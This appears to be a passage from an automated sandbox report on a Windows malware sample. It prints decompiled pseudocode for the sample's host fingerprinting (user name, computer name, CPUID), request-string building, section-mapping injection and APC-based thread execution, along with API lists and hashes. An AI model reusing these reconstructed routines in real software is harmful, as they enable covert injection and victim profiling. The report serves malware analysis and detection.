Opcode Fuzzy Hash: e4a62542c983bacc7ea2a1955bf0626cb3227eab05440f559c7a9f38d9d1aa28
Instruction Fuzzy Hash: C021AEB2A00548BBE710ABA4CC8CEEE3BE9EB9C350F1081A5F605D7150D6309AC8DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D965CE, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00D965CE(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xd9d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00D95043( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xd9d2a0 ^ 0x76f6612d;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xd9d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E00D93769(_v8 + _v8, _t64);
							}
							HeapFree( *0xd9d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xd9d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00D93769(_v8 + _v8, _t64);
						}
						HeapFree( *0xd9d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x00d965ce
0x00d965d6
0x00d965da
0x00d965dd
0x00d965e2
0x00d965e4
0x00d965e9
0x00d965e9
0x00d965ef
0x00d965f1
0x00d965fe
0x00d9665f
0x00d96600
0x00d96605
0x00d9660b
0x00d96610
0x00d9661e
0x00d96622
0x00d96631
0x00d96638
0x00d9663f
0x00d9663f
0x00d9664a
0x00d9664a
0x00d96622
0x00d96610
0x00d96661
0x00d96667
0x00d96671
0x00d96673
0x00d96678
0x00d96687
0x00d9668b
0x00d96696
0x00d9669d
0x00d966a4
0x00d966a4
0x00d966b0
0x00d966b0
0x00d9668b
0x00d966bb
0x00d966bd
0x00d966c0
0x00d966c2
0x00d966c5
0x00d966c8
0x00d966d2
0x00d966d6
0x00d966da

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 00D96605
RtlAllocateHeap.NTDLL(00000000,?), ref: 00D9661C
GetUserNameW.ADVAPI32(00000000,?), ref: 00D96629
HeapFree.KERNEL32(00000000,00000000), ref: 00D9664A
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00D96671
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00D96685
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00D96692
HeapFree.KERNEL32(00000000,00000000), ref: 00D966B0

Strings

Uxt, xrefs: 00D9664A, 00D966B0

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Uxt
API String ID: 3239747167-1536154274
Opcode ID: fe2bcdcde8471fd298aa4250b9c9ebf894f69880bb21a65a5894974e200f74ec
Instruction ID: bc0fb61a9bbae7daea29e19cc191f974a1d0c88e2c7b8b6edb4f6b9f521779bc
Opcode Fuzzy Hash: fe2bcdcde8471fd298aa4250b9c9ebf894f69880bb21a65a5894974e200f74ec
Instruction Fuzzy Hash: 04310AB2A00205EFDB10DFA9DD81A6EF7FAEF48700F15456AE505D7220EB30EE519B64

Uniqueness

Uniqueness Score: -1.00%

Function 00D96066, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00D96066(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00D96D10(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00D945B3(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00d96073
0x00d96074
0x00d96075
0x00d96076
0x00d96077
0x00d9607b
0x00d96082
0x00d96091
0x00d96094
0x00d96097
0x00d9609e
0x00d960a1
0x00d960a4
0x00d960a7
0x00d960aa
0x00d960b5
0x00d960b7
0x00d960c0
0x00d960c8
0x00d960ca
0x00d960dc
0x00d960e6
0x00d960ea
0x00d960f9
0x00d960fd
0x00d96106
0x00d9610e
0x00d9610e
0x00d96110
0x00d96110
0x00d96118
0x00d9611e
0x00d96122
0x00d96122
0x00d9612d

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00D960AD
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00D960C0
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00D960DC

Part of subcall function 00D96D10: RtlAllocateHeap.NTDLL(00000000,-00000008,00D95D29), ref: 00D96D1C

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00D960F9
memcpy.NTDLL(?,00000000,0000001C), ref: 00D96106
NtClose.NTDLL(?), ref: 00D96118
NtClose.NTDLL(00000000), ref: 00D96122

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 4589322b7ffbca910f73fac1d0e9110ae52f9d33dd5979eb3b150eca17c50536
Instruction ID: 32287552bc003936d89d14c56e4b44245d615d92c9906fd9d9d6ea1f82b2abd2
Opcode Fuzzy Hash: 4589322b7ffbca910f73fac1d0e9110ae52f9d33dd5979eb3b150eca17c50536
Instruction Fuzzy Hash: CA21E5B2A10218FBDF019F95CC859DEBFBDEB08740F104026F905F6221D7719A459BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00511E57, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00511E57(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E005111EA(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00511e60
0x00511e67
0x00511e68
0x00511e69
0x00511e6a
0x00511e6b
0x00511e7c
0x00511e80
0x00511e94
0x00511e97
0x00511e9a
0x00511ea1
0x00511ea4
0x00511eab
0x00511eae
0x00511eb1
0x00511eb4
0x00511eb9
0x00511ef4
0x00511ebb
0x00511ebe
0x00511ec4
0x00511ec9
0x00511ecd
0x00511eeb
0x00511ecf
0x00511ed6
0x00511ee4
0x00511ee4
0x00511ecd
0x00511efc

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 00511EB4

Part of subcall function 005111EA: NtMapViewOfSection.NTDLL(00000000,000000FF,00511EC9,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,00511EC9,?), ref: 00511217

memset.NTDLL ref: 00511ED6

Strings

@, xrefs: 00511EA4

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 7fc120d833c92780bbefd71088f43d077229a2744204003f70b99ebadbfa48a0
Instruction ID: 8936a6a21f9ddd7ee419be2908a79331b37ce1030dc2a5a1b842a2444ad253d1
Opcode Fuzzy Hash: 7fc120d833c92780bbefd71088f43d077229a2744204003f70b99ebadbfa48a0
Instruction Fuzzy Hash: CA21F9B2D00609AFDB11DFE9C8849EFFFB9FB48354F104569E615F3210D6349A448B64

Uniqueness

Uniqueness Score: -1.00%

Function 005111EA, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E005111EA(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x005111fc
0x00511202
0x00511210
0x00511217
0x0051121c
0x00511222
0x00000000
0x00511223
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,00511EC9,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,00511EC9,?), ref: 00511217

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: d3903549d8428d3b4d14aef33da434597a683699713f9fa02a42bed4989a3c76
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: EDF082B690020CBFEB119FA5CC84CAFBBBCEB44394B104979F252E1090D2309E488A60

Uniqueness

Uniqueness Score: -1.00%

Function 00D91000, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 212
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00D91000(long __eax, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				int _t54;
				void* _t55;
				intOrPtr _t56;
				void* _t61;
				void* _t64;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr* _t74;
				intOrPtr _t80;
				void* _t82;
				intOrPtr _t89;
				signed int _t93;
				char** _t95;
				int _t97;
				signed int _t99;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				void* _t110;
				int* _t111;
				void* _t119;
				intOrPtr _t122;
				void* _t124;
				long _t127;
				intOrPtr* _t128;
				intOrPtr* _t129;
				intOrPtr* _t132;

				_t119 = __edx;
				_t47 = __eax;
				_v8 = 8;
				if(__eax == 0) {
					_t47 = GetTickCount();
				}
				_t48 =  *0xd9d018; // 0x97601b6c
				asm("bswap eax");
				_t49 =  *0xd9d014; // 0x3a87c8cd
				asm("bswap eax");
				_t50 =  *0xd9d010; // 0xd8d2f808
				asm("bswap eax");
				_t51 =  *0xd9d00c; // 0x13d015ef
				asm("bswap eax");
				_t52 =  *0xd9d2a4; // 0x3e3a5a8
				_t2 = _t52 + 0xd9e633; // 0x74666f73
				_t54 = wsprintfA(_a16, _t2, 3, 0x3d132, _t51, _t50, _t49, _t48,  *0xd9d02c,  *0xd9d004, _t47);
				_t55 = E00D98616();
				_t56 =  *0xd9d2a4; // 0x3e3a5a8
				_t4 = _t56 + 0xd9e673; // 0x74707526
				wsprintfA(_a16 + _t54, _t4, _t55);
				_t122 =  *0xd9d324; // 0x4bd95b0
				_t61 = E00D966DB(0xd9d00a, _t122 + 4);
				_t127 = 0;
				_v20 = _t61;
				if(_t61 == 0) {
					L22:
					RtlFreeHeap( *0xd9d238, _t127, _a16); // executed
					return _v8;
				}
				_t64 = RtlAllocateHeap( *0xd9d238, 0, 0x800);
				_v16 = _t64;
				if(_t64 == 0) {
					L21:
					HeapFree( *0xd9d238, _t127, _v20);
					goto L22;
				}
				E00D959B0(GetTickCount());
				_t68 =  *0xd9d324; // 0x4bd95b0
				__imp__(_t68 + 0x40);
				asm("lock xadd [eax], ecx");
				_t72 =  *0xd9d324; // 0x4bd95b0
				__imp__(_t72 + 0x40);
				_t74 =  *0xd9d324; // 0x4bd95b0
				_t124 = E00D969CF(1, _t119, _a16,  *_t74);
				_v28 = _t124;
				asm("lock xadd [eax], ecx");
				if(_t124 == 0) {
					L20:
					HeapFree( *0xd9d238, _t127, _v16);
					goto L21;
				}
				StrTrimA(_t124, 0xd9c294);
				_t80 =  *0xd9d2a4; // 0x3e3a5a8
				_push(_t124);
				_t10 = _t80 + 0xd9e252; // 0x616d692f
				_t82 = E00D95FD1(_t10);
				_v12 = _t82;
				if(_t82 == 0) {
					L19:
					HeapFree( *0xd9d238, _t127, _t124);
					goto L20;
				}
				_t128 = __imp__;
				 *_t128(_t124, _a4);
				_t110 = _v16;
				 *_t128(_t110, _v20);
				_t129 = __imp__;
				 *_t129(_t110, _v12);
				 *_t129(_t110, _t124);
				_t89 = E00D9A5A3(0, _t110);
				_a4 = _t89;
				if(_t89 == 0) {
					_v8 = 8;
					L17:
					E00D95225();
					L18:
					HeapFree( *0xd9d238, 0, _v12);
					_t127 = 0;
					goto L19;
				}
				_t93 = E00D91297(_t110, 0xffffffffffffffff, _t124,  &_v24); // executed
				_t111 = _a12;
				_v8 = _t93;
				if(_t93 == 0) {
					_t132 = _v24;
					_t99 = E00D93DCD(_t132, _a4, _a8, _t111); // executed
					_v8 = _t99;
					_t100 =  *((intOrPtr*)(_t132 + 8));
					 *((intOrPtr*)( *_t100 + 0x80))(_t100);
					_t102 =  *((intOrPtr*)(_t132 + 8));
					 *((intOrPtr*)( *_t102 + 8))(_t102);
					_t104 =  *((intOrPtr*)(_t132 + 4));
					 *((intOrPtr*)( *_t104 + 8))(_t104);
					_t106 =  *_t132;
					 *((intOrPtr*)( *_t106 + 8))(_t106);
					E00D945B3(_t132);
				}
				if(_v8 != 0x10d2) {
					L12:
					if(_v8 == 0) {
						_t95 = _a8;
						if(_t95 != 0) {
							_t130 =  *_t111;
							_t125 =  *_t95;
							wcstombs( *_t95,  *_t95,  *_t111);
							_t97 = E00D94725(_t125, _t125, _t130 >> 1);
							_t124 = _v28;
							 *_t111 = _t97;
						}
					}
					goto L15;
				} else {
					if(_a8 != 0) {
						L15:
						E00D945B3(_a4);
						if(_v8 == 0 || _v8 == 0x10d2) {
							goto L18;
						} else {
							goto L17;
						}
					}
					_v8 = _v8 & 0x00000000;
					goto L12;
				}
			}

0x00d91000
0x00d91000
0x00d9100f
0x00d91018
0x00d9101a
0x00d9101a
0x00d91023
0x00d9102e
0x00d91031
0x00d9103c
0x00d9103f
0x00d91044
0x00d91047
0x00d9104c
0x00d9104f
0x00d9105b
0x00d91065
0x00d9106c
0x00d91072
0x00d91077
0x00d91084
0x00d91086
0x00d91097
0x00d9109c
0x00d9109e
0x00d910a3
0x00d91274
0x00d9127e
0x00d9128b
0x00d9128b
0x00d910b5
0x00d910bb
0x00d910c0
0x00d91264
0x00d9126e
0x00000000
0x00d9126e
0x00d910c8
0x00d910cd
0x00d910d6
0x00d910e7
0x00d910eb
0x00d910f4
0x00d910fa
0x00d91109
0x00d91110
0x00d91119
0x00d9111f
0x00d91254
0x00d9125e
0x00000000
0x00d9125e
0x00d9112b
0x00d91131
0x00d91136
0x00d91137
0x00d9113e
0x00d91143
0x00d91148
0x00d91246
0x00d9124e
0x00000000
0x00d9124e
0x00d91151
0x00d91158
0x00d9115d
0x00d91161
0x00d91166
0x00d9116d
0x00d91171
0x00d91176
0x00d9117b
0x00d91180
0x00d9128e
0x00d9122e
0x00d9122e
0x00d91233
0x00d9123e
0x00d91244
0x00000000
0x00d91244
0x00d9118a
0x00d9118f
0x00d91192
0x00d91197
0x00d91199
0x00d911a5
0x00d911aa
0x00d911ad
0x00d911b3
0x00d911b9
0x00d911bf
0x00d911c2
0x00d911c8
0x00d911cb
0x00d911d0
0x00d911d4
0x00d911d4
0x00d911e0
0x00d911ec
0x00d911f0
0x00d911f2
0x00d911f7
0x00d911f9
0x00d911fb
0x00d91200
0x00d9120d
0x00d91212
0x00d91215
0x00d91215
0x00d911f7
0x00000000
0x00d911e2
0x00d911e6
0x00d91217
0x00d9121a
0x00d91223
0x00000000
0x00000000
0x00000000
0x00000000
0x00d91223
0x00d911e8
0x00000000
0x00d911e8

APIs

GetTickCount.KERNEL32 ref: 00D9101A
wsprintfA.USER32 ref: 00D91065
wsprintfA.USER32 ref: 00D91084
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00D910B5
GetTickCount.KERNEL32 ref: 00D910C6
RtlEnterCriticalSection.NTDLL(04BD9570), ref: 00D910D6
RtlLeaveCriticalSection.NTDLL(04BD9570), ref: 00D910F4
StrTrimA.SHLWAPI(00000000,00D9C294,?,04BD95B0), ref: 00D9112B
lstrcpy.KERNEL32(00000000,?), ref: 00D91158
lstrcpy.KERNEL32(?,?), ref: 00D91161
lstrcat.KERNEL32(?,?), ref: 00D9116D
lstrcat.KERNEL32(?,00000000), ref: 00D91171

Part of subcall function 00D9A5A3: lstrlen.KERNEL32(?,00000000,00D9D330,00000001,00D9453C,00D9D00C,00D9D00C,00000000,00000005,00000000,00000000,?,?,?,00D9857A,?), ref: 00D9A5AC
Part of subcall function 00D9A5A3: mbstowcs.NTDLL ref: 00D9A5D3
Part of subcall function 00D9A5A3: memset.NTDLL ref: 00D9A5E5

wcstombs.NTDLL ref: 00D91200

Part of subcall function 00D93DCD: SysAllocString.OLEAUT32(?), ref: 00D93E08
Part of subcall function 00D93DCD: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00D93E8B

Part of subcall function 00D945B3: HeapFree.KERNEL32(00000000,00000000,00D95DE9,00000000,?,?,-00000008), ref: 00D945BF

HeapFree.KERNEL32(00000000,?,?), ref: 00D9123E
HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 00D9124E
HeapFree.KERNEL32(00000000,?,?,04BD95B0), ref: 00D9125E
HeapFree.KERNEL32(00000000,?), ref: 00D9126E
RtlFreeHeap.NTDLL(00000000,?), ref: 00D9127E

Strings

Uxt, xrefs: 00D9123E, 00D9124E, 00D9125E, 00D9126E, 00D9127E

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$CountCriticalSectionTicklstrcatlstrcpywsprintf$AllocAllocateEnterInterface_LeaveProxyQueryStringTrimUnknown_lstrlenmbstowcsmemsetwcstombs
String ID: Uxt
API String ID: 4121355665-1536154274
Opcode ID: fc497999daa3fb15d5d176930954e98d0108e406420de9a7803614aacab00dbe
Instruction ID: 16360cb50b314072132c13a50f605ecedb6ad5286319022cb650f60669fa695e
Opcode Fuzzy Hash: fc497999daa3fb15d5d176930954e98d0108e406420de9a7803614aacab00dbe
Instruction Fuzzy Hash: 9D714475900209EFCF11EFA4DC49AAABBB9EF49310F144456F909EB361CB319941DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00511F17, Relevance: 22.6, APIs: 15, Instructions: 112
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00511F17(void* __ecx, void* __edx, void* __edi, long _a4) {
				long _v8;
				void* _v32;
				long _t21;
				long _t23;
				long _t25;
				void* _t26;
				long _t29;
				long _t30;
				long _t34;
				void* _t39;
				intOrPtr _t42;
				void* _t47;
				void* _t52;
				signed int _t55;
				void* _t57;
				intOrPtr* _t58;

				_t47 = __ecx;
				_t21 = E005110D8();
				_v8 = _t21;
				if(_t21 != 0) {
					return _t21;
				}
				do {
					_t55 = SwitchToThread() + 8;
					_t23 = E00511B04(__edi, _t55); // executed
					_v8 = _t23;
					Sleep(0x20 + _t55 * 4); // executed
					_t25 = _v8;
				} while (_t25 == 0xc);
				if(_t25 != 0) {
					L21:
					return _t25;
				}
				_push(__edi);
				if(_a4 != 0) {
					L11:
					_t26 = CreateThread(0, 0, __imp__SleepEx,  *0x514140, 0, 0); // executed
					_t57 = _t26;
					if(_t57 == 0) {
						L18:
						_v8 = GetLastError();
						L19:
						_t25 = _v8;
						if(_t25 == 0xffffffff) {
							_t25 = GetLastError();
						}
						goto L21;
					}
					_t29 = QueueUserAPC(E00511280, _t57,  &_v32); // executed
					if(_t29 == 0) {
						_t34 = GetLastError();
						_a4 = _t34;
						TerminateThread(_t57, _t34);
						CloseHandle(_t57);
						_t57 = 0;
						SetLastError(_a4);
					}
					if(_t57 == 0) {
						goto L18;
					} else {
						_t30 = WaitForSingleObject(_t57, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t57,  &_v8);
						}
						CloseHandle(_t57);
						goto L19;
					}
				}
				if(E005118FC(_t47,  &_a4) != 0) {
					 *0x514138 = 0;
					goto L11;
				}
				_t58 = __imp__GetLongPathNameW;
				_t39 =  *_t58(_a4, 0, 0); // executed
				_t52 = _t39;
				if(_t52 == 0) {
					L9:
					 *0x514138 = _a4;
					goto L11;
				}
				_t10 = _t52 + 2; // 0x2
				_t42 = E0051163D(_t52 + _t10);
				 *0x514138 = _t42;
				if(_t42 == 0) {
					goto L9;
				}
				 *_t58(_a4, _t42, _t52); // executed
				E00511628(_a4);
				goto L11;
			}

0x00511f17
0x00511f1e
0x00511f25
0x00511f2a
0x0051204b
0x0051204b
0x00511f31
0x00511f39
0x00511f3d
0x00511f42
0x00511f4d
0x00511f53
0x00511f56
0x00511f5d
0x00512048
0x00000000
0x00512048
0x00511f63
0x00511f67
0x00511fbd
0x00511fcd
0x00511fd3
0x00511fdd
0x00512038
0x0051203a
0x0051203d
0x0051203d
0x00512044
0x00512046
0x00512046
0x00000000
0x00512044
0x00511fe9
0x00511ff7
0x00511ff9
0x00511ffd
0x00512000
0x00512007
0x0051200c
0x0051200e
0x0051200e
0x00512016
0x00000000
0x00512018
0x0051201b
0x00512021
0x00512026
0x0051202d
0x0051202d
0x00512034
0x00000000
0x00512034
0x00512016
0x00511f74
0x00511fb7
0x00000000
0x00511fb7
0x00511f76
0x00511f81
0x00511f83
0x00511f87
0x00511fad
0x00511fb0
0x00000000
0x00511fb0
0x00511f89
0x00511f8e
0x00511f93
0x00511f9a
0x00000000
0x00000000
0x00511fa1
0x00511fa6
0x00000000

APIs

Part of subcall function 005110D8: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00511F23), ref: 005110E7
Part of subcall function 005110D8: GetVersion.KERNEL32(?,00511F23), ref: 005110F6
Part of subcall function 005110D8: GetCurrentProcessId.KERNEL32(?,00511F23), ref: 00511112
Part of subcall function 005110D8: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00511F23), ref: 0051112B

SwitchToThread.KERNEL32 ref: 00511F31

Part of subcall function 00511B04: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00511B5A
Part of subcall function 00511B04: memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,00511F42,-00000008), ref: 00511BEC
Part of subcall function 00511B04: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00511C07

Sleep.KERNELBASE(00000000,-00000008), ref: 00511F4D
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00511F81
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00511FA1
CreateThread.KERNEL32 ref: 00511FCD
QueueUserAPC.KERNELBASE(00511280,00000000,?), ref: 00511FE9
GetLastError.KERNEL32 ref: 00511FF9
TerminateThread.KERNEL32(00000000,00000000), ref: 00512000
CloseHandle.KERNEL32(00000000), ref: 00512007
SetLastError.KERNEL32(?), ref: 0051200E
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0051201B
GetExitCodeThread.KERNEL32(00000000,?), ref: 0051202D
CloseHandle.KERNEL32(00000000), ref: 00512034
GetLastError.KERNEL32 ref: 00512038
GetLastError.KERNEL32 ref: 00512046

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
String ID:
API String ID: 3896949738-0
Opcode ID: 6f57ce63154efc6393852f24d2e6f8328719e38d1ec53b8f39029d0f907a74ea
Instruction ID: f3064c16f51c87a6d12db77bd49a453a439b5511437bb52782aa53f68e54774d
Opcode Fuzzy Hash: 6f57ce63154efc6393852f24d2e6f8328719e38d1ec53b8f39029d0f907a74ea
Instruction Fuzzy Hash: EE313D71900519BFEB11AFA4DC8CCDE7FA8BA2C394B108565FA05D2110D7349F89EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D96130, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 152
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00D96130(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xd9d240);
					_v76 = 0;
					_v80 = 0;
					L00D9AE98();
					_v84.LowPart = _t46;
